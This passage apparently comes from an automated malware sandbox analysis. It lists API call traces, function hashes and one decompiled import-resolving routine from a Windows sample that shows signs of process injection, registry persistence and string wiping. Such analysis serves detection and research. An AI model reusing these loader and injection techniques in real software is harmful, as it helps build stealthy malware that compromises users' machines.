    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
